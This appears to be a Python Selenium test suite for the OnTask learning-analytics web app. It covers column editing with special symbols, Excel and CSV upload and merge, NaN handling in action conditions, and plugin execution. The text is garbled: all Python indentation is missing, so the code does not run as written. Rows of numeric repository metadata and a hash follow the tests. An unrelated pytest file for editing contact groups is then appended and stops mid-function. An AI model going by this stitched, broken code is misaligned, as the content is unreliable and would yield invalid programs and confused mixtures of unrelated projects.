# Go Back to the action table
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'action-table_previous'))
)
# Edit the action out
self.selenium.find_element_by_xpath(
"//table[@id='action-table']/tbody/tr[2]/td[5]/div/a").click()
# Insert attribute
self.selenium.find_element_by_id("select-attribute-name").click()
Select(self.selenium.find_element_by_id(
"select-attribute-name")).select_by_visible_text("- Attribute -")
# Insert column name
self.selenium.find_element_by_id("select-column-name").click()
Select(self.selenium.find_element_by_id(
"select-column-name")).select_by_visible_text(symbols)
# Insert second column name
self.selenium.find_element_by_id("select-column-name").click()
Select(self.selenium.find_element_by_id(
"select-column-name")).select_by_visible_text(symbols + '2')
# Create new condition
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[3]").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'id_description_text')))
# Set the values of the condition
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys(symbols + "4")
self.selenium.find_element_by_id("id_description_text").click()
self.selenium.find_element_by_name("builder_rule_0_filter").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_filter")).select_by_visible_text(symbols)
self.selenium.find_element_by_name("builder_rule_0_operator").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_operator")).select_by_visible_text(
"begins with")
self.selenium.find_element_by_name("builder_rule_0_value_0").click()
self.selenium.find_element_by_name("builder_rule_0_value_0").clear()
self.selenium.find_element_by_name("builder_rule_0_value_0").send_keys(
"C")
# Save the condition
self.selenium.find_element_by_xpath(
"(//button[@type='submit'])[2]").click()
self.wait_close_modal_refresh_table('html-editor')
# Create a filter
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'id_description_text')))
# Fill in the details
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys(symbols)
self.selenium.find_element_by_name("builder_rule_0_filter").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_filter")).select_by_visible_text(symbols + "2")
self.selenium.find_element_by_name("builder_rule_0_operator").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_operator")).select_by_visible_text(
"doesn't begin with")
self.selenium.find_element_by_name("builder_rule_0_value_0").click()
self.selenium.find_element_by_name("builder_rule_0_value_0").clear()
self.selenium.find_element_by_name("builder_rule_0_value_0").send_keys(
"x")
# Save the filter
self.selenium.find_element_by_xpath(
"(//button[@type='submit'])[2]").click()
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for page to reload
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//h4[@id='filter-set']/div/button")
)
)
# Click the preview button
self.selenium.find_element_by_xpath(
"//div[@id='html-editor']/form/div[3]/button").click()
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable((By.CLASS_NAME, 'js-action-preview-nxt'))
)
# Certain name should be in the page now.
self.assertIn('Carmelo Coton', self.selenium.page_source)
# Click in the "Close" button
self.selenium.find_element_by_xpath(
"//div[@id='modal-item']/div/div/div/div[2]/button[2]").click()
# End of session
self.logout()
def test_02_symbols(self):
symbols = '!#$%&()*+,-./:;<=>?@[\]^_`{|}~'
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('sss')
wf_link.click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Select the email column and click in the edit button
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[3]/td[5]/div/button"
).click()
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[3]/td[5]/div/ul/li[1]/button"
).click()
# Wait for the form to create the derived column
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Edit column')
)
# Append symbols to the name
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").send_keys(symbols)
# Save column information
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
self.wait_close_modal_refresh_table('column-table_previous')
# Select the age column and click in the edit button
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[4]/td[5]/div/button"
).click()
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[4]/td[5]/div/ul/li[1]/button"
).click()
# Wait for the modal to open
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Edit column')
)
# Append symbols to the name
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").send_keys(symbols)
# Save column information
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
self.wait_close_modal_refresh_table('column-table_previous')
# Go to the table link
self.selenium.find_element_by_link_text("Table").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'table-data_previous'))
)
# Verify that everything appears normally
self.assertIn(escape(symbols), self.selenium.page_source)
self.assertIn('<td class=" dt-center">12</td>',
self.selenium.page_source)
self.assertIn('<td class=" dt-center">12.1</td>',
self.selenium.page_source)
self.assertIn('<td class=" dt-center">13.2</td>',
self.selenium.page_source)
# Go to the actions page
self.selenium.find_element_by_link_text("Actions").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'action-table_previous'))
)
# Edit the action-in at the top of the table
self.selenium.find_element_by_link_text("Edit").click()
# Set the correct values for an action-in
# Set the right columns to process
select = Select(self.selenium.find_element_by_id(
'select-key-column-name'))
select.select_by_visible_text('email')
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable((By.CLASS_NAME,
'js-workflow-column-edit'))
)
# Done editing the action in
self.selenium.find_element_by_link_text('Done').click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'action-table_previous'))
)
# Click in the run link
self.selenium.find_element_by_link_text("Run").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Click on the first value
self.selenium.find_element_by_link_text("student1@bogus.com").click()
# Modify the value of the column
self.selenium.find_element_by_id("id____ontask___select_1").click()
self.selenium.find_element_by_id("id____ontask___select_1").clear()
self.selenium.find_element_by_id("id____ontask___select_1").send_keys(
"14"
)
# Submit changes to the first element
self.selenium.find_element_by_xpath(
"(//button[@name='submit'])[1]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Click on the second value
self.selenium.find_element_by_link_text("student2@bogus.com").click()
# Modify the value of the column
self.selenium.find_element_by_id("id____ontask___select_1").clear()
self.selenium.find_element_by_id(
"id____ontask___select_1"
).send_keys("15")
# Submit changes to the second element
self.selenium.find_element_by_xpath(
"(//button[@name='submit'])[1]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Click on the third value
self.selenium.find_element_by_link_text("student3@bogus.com").click()
# Modify the value of the column
self.selenium.find_element_by_id("id____ontask___select_1").click()
self.selenium.find_element_by_id("id____ontask___select_1").clear()
self.selenium.find_element_by_id(
"id____ontask___select_1"
).send_keys("16")
# Submit changes to the second element
self.selenium.find_element_by_xpath(
"(//button[@name='submit'])[1]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Click in the back link!
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]"
).click()
# Wait for page to refresh
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'action-table_previous'))
)
# Go to the table page
self.selenium.find_element_by_link_text("Table").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'table-data_previous'))
)
# Assert the new values
self.assertIn('<td class=" dt-center">14</td>',
self.selenium.page_source)
self.assertIn('<td class=" dt-center">15</td>',
self.selenium.page_source)
self.assertIn('<td class=" dt-center">16</td>',
self.selenium.page_source)
# End of session
self.logout()
class DataopsExcelUpload(test.OntaskLiveTestCase):
fixtures = ['empty_wflow']
def tearDown(self):
pandas_db.delete_all_tables()
super(DataopsExcelUpload, self).tearDown()
def test_01_excelupload(self):
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('wflow1')
wf_link.click()
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Data Upload/Merge").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Data Upload/Merge')
)
self.selenium.find_element_by_link_text("Excel Upload/Merge").click()
self.selenium.find_element_by_id("id_file").send_keys(
os.path.join(settings.BASE_DIR(),
'dataops',
'fixtures',
'excel_upload.xlsx')
)
self.selenium.find_element_by_id("id_sheet").click()
self.selenium.find_element_by_id("id_sheet").clear()
self.selenium.find_element_by_id("id_sheet").send_keys("results")
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.ID, 'checkAll'))
)
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Details')
)
# The number of rows must be 29
wflow = Workflow.objects.all()[0]
self.assertEqual(wflow.nrows, 29)
self.assertEqual(wflow.ncols, 14)
# End of session
self.logout()
class DataopsExcelUploadSheet(test.OntaskLiveTestCase):
fixtures = ['empty_wflow']
def tearDown(self):
pandas_db.delete_all_tables()
super(DataopsExcelUploadSheet, self).tearDown()
def test_01_excelupload_sheet(self):
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('wflow1')
wf_link.click()
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Data Upload/Merge").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Data Upload/Merge')
)
self.selenium.find_element_by_link_text("Excel Upload/Merge").click()
self.selenium.find_element_by_id("id_file").send_keys(
os.path.join(settings.BASE_DIR(),
'dataops',
'fixtures',
'excel_upload.xlsx')
)
self.selenium.find_element_by_id("id_sheet").click()
self.selenium.find_element_by_id("id_sheet").clear()
self.selenium.find_element_by_id("id_sheet").send_keys("second sheet")
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.ID, 'checkAll'))
)
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Details')
)
# The number of rows must be 19
wflow = Workflow.objects.all()[0]
self.assertEqual(wflow.nrows, 19)
self.assertEqual(wflow.ncols, 14)
# End of session
self.logout()
class DataopsNaNProcessing(test.OntaskLiveTestCase):
fixtures = ['empty_wflow']
action_text = "Bool1 = {{ bool1 }}\\n" + \
"Bool2 = {{ bool2 }}\\n" + \
"Bool3 = {{ bool3 }}\\n" + \
"{% if bool1 cond %}Bool 1 is true{% endif %}\\n" + \
"{% if bool2 cond %}Bool 2 is true{% endif %}\\n" + \
"{% if bool3 cond %}Bool 3 is true{% endif %}\\n"
def tearDown(self):
pandas_db.delete_all_tables()
super(DataopsNaNProcessing, self).tearDown()
def test_01_nan_manipulation(self):
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# Create new workflow
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'id_name'))
)
# Insert name and click create
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys("NaN")
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
# Wait for details page
WebDriverWait(self.selenium, 20).until(
EC.title_is('OnTask :: Details')
)
# Open the Dataops page
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Data Upload/Merge").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Data Upload/Merge')
)
# Start the upload process: Select upload
self.selenium.find_element_by_link_text("CSV Upload/Merge").click()
# Select file and upload
self.selenium.find_element_by_id("id_file").send_keys(
os.path.join(settings.BASE_DIR(),
'dataops',
'fixtures',
'test_df_merge_update_df1.csv')
)
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'page-header'),
'Step 2: Select Columns')
)
# Submit
self.selenium.find_element_by_xpath(
"(//button[@name='Submit'])[2]"
).click()
# Wait for the upload/merge
WebDriverWait(self.selenium, 20).until(
EC.title_is('OnTask :: Details')
)
# Select again the upload/merge function
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Data Upload/Merge").click()
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Data Upload/Merge')
)
self.selenium.find_element_by_link_text("CSV Upload/Merge").click()
# Select the second file and submit
self.selenium.find_element_by_id("id_file").send_keys(
os.path.join(settings.BASE_DIR(),
'dataops',
'fixtures',
'test_df_merge_update_df2.csv')
)
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'page-header'),
'Step 2: Select Columns')
)
# Select all the columns for upload
self.selenium.find_element_by_name("Submit").click()
# Wait for the upload/merge
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.CLASS_NAME, 'page-header'),
'Step 3: Select Keys and Merge Option')
)
# Choose the default options for the merge (key and outer)
# Select the merger function type
select = Select(self.selenium.find_element_by_id('id_how_merge'))
select.select_by_value('outer')
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.CLASS_NAME, 'page-header'),
'Step 4: Review and confirm')
)
# Check the merge summary and proceed
self.selenium.find_element_by_name("Submit").click()
# Wait for the upload/merge to finish
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'page-header'),
'Workflow Details')
)
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.CLASS_NAME, 'success'))
)
# Go to the actions page
self.selenium.find_element_by_link_text("Actions").click()
# Create a new action
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[3]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'id_name'))
)
# Type action name and click complete to edit
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys("action out")
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//h4[@id='filter-set']/div/button")
)
)
# Create the first condition.
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[3]"
).click()
# Wait for the form to appear
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Create condition')
)
# Add name and condition
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys("bool1 cond")
self.selenium.find_element_by_name("builder_rule_0_filter").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_filter")).select_by_visible_text("bool1")
# Wait for the select elements to be clickable
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//input[@name='builder_rule_0_value_0']")
)
)
self.selenium.find_element_by_xpath(
"(//input[@name='builder_rule_0_value_0'])[2]").click()
self.selenium.find_element_by_xpath(
"(//button[@type='submit'])[2]"
).click()
# MODAL WAITING
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for page to refresh
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.CLASS_NAME, 'js-condition-edit')
)
)
# Create the second condition
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[3]"
).click()
# Wait for the form to appear
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Create condition')
)
# Add name and condition
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys("bool2 cond")
self.selenium.find_element_by_name("builder_rule_0_filter").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_filter")).select_by_visible_text("bool2")
# Wait for the select elements to be clickable
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//input[@name='builder_rule_0_value_0']")
)
)
self.selenium.find_element_by_xpath(
"(//input[@name='builder_rule_0_value_0'])[2]").click()
self.selenium.find_element_by_xpath(
"(//button[@type='submit'])[2]"
).click()
# MODAL WAITING
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for page to refresh
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.CLASS_NAME, 'js-condition-edit')
)
)
# Create the third condition
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[3]"
).click()
# Wait for the form to appear
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Create condition')
)
# Add name and condition
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys("bool3 cond")
self.selenium.find_element_by_name("builder_rule_0_filter").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_filter")).select_by_visible_text("bool3")
# Wait for the select elements to be clickable
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//input[@name='builder_rule_0_value_0']")
)
)
self.selenium.find_element_by_xpath(
"(//input[@name='builder_rule_0_value_0'])[2]").click()
self.selenium.find_element_by_xpath(
"(//button[@type='submit'])[2]").click()
# MODAL WAITING
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for page to refresh
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable(
(By.CLASS_NAME, 'js-condition-edit')
)
)
# insert the action text
self.selenium.execute_script(
"""$('#id_content').summernote('editor.insertText',
"{0}");""".format(self.action_text)
)
# Click in the preview and circle around the 12 rows
self.selenium.find_element_by_xpath(
"//button[contains(@class, 'js-action-preview')]").click()
# Wait for the modal to appear
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/div/div/h4"),
'Action Preview 1')
)
for x in range(11):
self.selenium.find_element_by_xpath(
"//div[@id='modal-item']/div/div/div/div[2]/button[3]/span"
).click()
# End of session
self.logout()
class DataopsPluginExecution(test.OntaskLiveTestCase):
fixtures = ['plugin_execution']
filename = os.path.join(
settings.BASE_DIR(),
'dataops',
'fixtures',
'plugin_execution.sql'
)
def setUp(self):
super(DataopsPluginExecution, self).setUp()
pandas_db.pg_restore_table(self.filename)
def tearDown(self):
pandas_db.delete_all_tables()
super(DataopsPluginExecution, self).tearDown()
def test_01_first_plugin(self):
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('Plugin test')
wf_link.click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Open the transform page
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Transform").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'transform-table_previous'))
)
# Click in the first plugin
self.selenium.find_element_by_link_text("Run").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.NAME, 'csrfmiddlewaretoken'))
)
# Provide the execution data
self.selenium.find_element_by_xpath("//input[@type='text']").click()
self.selenium.find_element_by_name("columns").click()
self.selenium.find_element_by_xpath(
"(//input[@name='columns'])[2]"
).click()
# Click outside the SOL widget
self.selenium.find_element_by_class_name(
'sol-current-selection'
).click()
self.selenium.find_element_by_id("id_merge_key").click()
Select(self.selenium.find_element_by_id(
"id_merge_key"
)).select_by_visible_text("email")
# Submit the execution
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'plugin-execution-report'))
)
# Done. Click continue.
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Assert the content of the dataframe
wflow = Workflow.objects.get(name='Plugin test')
df = pandas_db.load_from_db(wflow.id)
self.assertTrue('RESULT 1' in set(df.columns))
self.assertTrue('RESULT 2' in set(df.columns))
self.assertTrue(all([x == 1 for x in df['RESULT 1']]))
self.assertTrue(all([x == 2 for x in df['RESULT 2']]))
# Second execution, this time adding a suffix to the column
# Open the transform page
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Transform").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'transform-table_previous'))
)
# Click in the first plugin
self.selenium.find_element_by_link_text("Run").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.NAME, 'csrfmiddlewaretoken'))
)
# Provide the execution data
self.selenium.find_element_by_xpath("//input[@type='text']").click()
self.selenium.find_element_by_name("columns").click()
self.selenium.find_element_by_xpath(
"(//input[@name='columns'])[2]"
).click()
# Click outside the SOL widget
self.selenium.find_element_by_class_name(
'sol-current-selection'
).click()
self.selenium.find_element_by_id("id_merge_key").click()
Select(self.selenium.find_element_by_id(
"id_merge_key"
)).select_by_visible_text("email")
# Put the suffix _2
self.selenium.find_element_by_id("id_out_column_suffix").click()
self.selenium.find_element_by_id("id_out_column_suffix").clear()
self.selenium.find_element_by_id("id_out_column_suffix").send_keys("_2")
# Submit the execution
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'plugin-execution-report'))
)
# Done. Click continue.
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Assert the content of the dataframe
wflow = Workflow.objects.get(name='Plugin test')
df = pandas_db.load_from_db(wflow.id)
self.assertTrue('RESULT 1_2' in set(df.columns))
self.assertTrue('RESULT 2_2' in set(df.columns))
self.assertTrue(all([x == 1 for x in df['RESULT 1_2']]))
self.assertTrue(all([x == 2 for x in df['RESULT 2_2']]))
# End of session
self.logout()
def test_02_second_plugin(self):
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('Plugin test')
wf_link.click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Open the transform page
self.selenium.find_element_by_link_text("Dataops").click()
self.selenium.find_element_by_link_text("Transform").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'transform-table_previous'))
)
# Click in the second plugin
self.selenium.find_element_by_xpath(
"//table[@id='transform-table']/tbody/tr[2]/td[7]/div/a"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.NAME, 'csrfmiddlewaretoken'))
)
# Provide the execution data
self.selenium.find_element_by_id("id_merge_key").click()
Select(self.selenium.find_element_by_id(
"id_merge_key"
)).select_by_visible_text("email")
# Submit the execution
self.selenium.find_element_by_name("Submit").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'plugin-execution-report'))
)
# Done. Click continue.
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]"
).click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Assert the content of the dataframe
wflow = Workflow.objects.get(name='Plugin test')
df = pandas_db.load_from_db(wflow.id)
self.assertTrue('RESULT 3' in set(df.columns))
self.assertTrue('RESULT 4' in set(df.columns))
self.assertTrue(df['RESULT 3'].equals(df['A1'] + df['A2']))
self.assertTrue(df['RESULT 4'].equals(df['A1'] - df['A2']))
# End of session
self.logout()
| 39.524618
| 80
| 0.616817
| 5,698
| 46,560
| 4.765883
| 0.061074
| 0.147592
| 0.130211
| 0.187178
| 0.886876
| 0.872257
| 0.857195
| 0.845854
| 0.816983
| 0.797209
| 0
| 0.012306
| 0.258247
| 46,560
| 1,177
| 81
| 39.558199
| 0.774004
| 0.102298
| 0
| 0.687799
| 0
| 0.013158
| 0.188937
| 0.108081
| 0
| 0
| 0
| 0
| 0.046651
| 1
| 0.016746
| false
| 0
| 0.021531
| 0
| 0.053828
| 0.001196
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d61423b02a0349218f2fd6cfe6434e4146b9fcd3
| 5,925
|
py
|
Python
|
test/test_edit_group.py
|
elaginm/python_training
|
b0d76d3eac93d90401b6b3a137d3dc9a8caa8a5f
|
[
"Apache-2.0"
] | null | null | null |
test/test_edit_group.py
|
elaginm/python_training
|
b0d76d3eac93d90401b6b3a137d3dc9a8caa8a5f
|
[
"Apache-2.0"
] | null | null | null |
test/test_edit_group.py
|
elaginm/python_training
|
b0d76d3eac93d90401b6b3a137d3dc9a8caa8a5f
|
[
"Apache-2.0"
] | null | null | null |
from model.group import Group
import random
import pytest
def test_edit_name(app, db, check_ui):
with pytest.allure.step('Given a non-empty group list'):
old_groups = db.get_group_list()
group = Group(name="New group")
if app.group.count() == 0:
app.group.create(Group(name="Test group"))
app.group.edit_first_group(group)
app.group.delete_first_group()
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
else:
l = len(old_groups)
random_group_index = random.randrange(l)
group.id = old_groups[random_group_index].id
with pytest.allure.step('I modify the group %s in the list' % group):
app.group.edit_group_by_id(group.id, group)
with pytest.allure.step('the new group list is equal to the old list with the modified group'):
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[random_group_index] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
with pytest.allure.step('check UI'):
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
# random_group = random.choice(old_groups)
# group.id = random_group.id
# app.group.edit_group_by_id(group.id, group)
# new_groups = db.get_group_list()
# assert len(old_groups) == len(new_groups)
# result = re.match('^[^:]*', str(random_group))
# id = result.group(0)
# index_group = None
# i = 0
# while index_group is None and i in range(len(old_groups)):
# result_old_group = re.match('^[^:]*', str(old_groups[i]))
# id_old_group = result_old_group.group(0)
# if (int(id_old_group) == int(id)):
# index_group = i
# i+=1
def test_edit_empty_name(app, db, check_ui):
with pytest.allure.step('Given a non-empty group list'):
old_groups = db.get_group_list()
group = Group(name="Test")
if app.group.count() == 0:
app.group.create(Group(name=""))
app.group.edit_first_group(group)
app.group.delete_first_group()
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
else:
l = len(old_groups)
random_group_index = random.randrange(l)
group.id = old_groups[random_group_index].id
with pytest.allure.step('I modify the group with id=%s in the list' % group.id):
if app.group.empty_name(group.id):
app.open_home_page()
else:
app.group.edit_group_by_id(group.id, group)
with pytest.allure.step('the new group list is equal to the old list with the modified group'):
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[random_group_index] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
with pytest.allure.step('check UI'):
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(),
key=Group.id_or_max)
def test_edit_non_empty_name(app, db, check_ui):
with pytest.allure.step('Given a non-empty group list'):
old_groups = db.get_group_list()
group = Group(name="")
if app.group.count() == 0:
app.group.create(Group(name="Users"))
app.group.edit_first_group(group)
app.group.delete_first_group()
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
else:
l = len(old_groups)
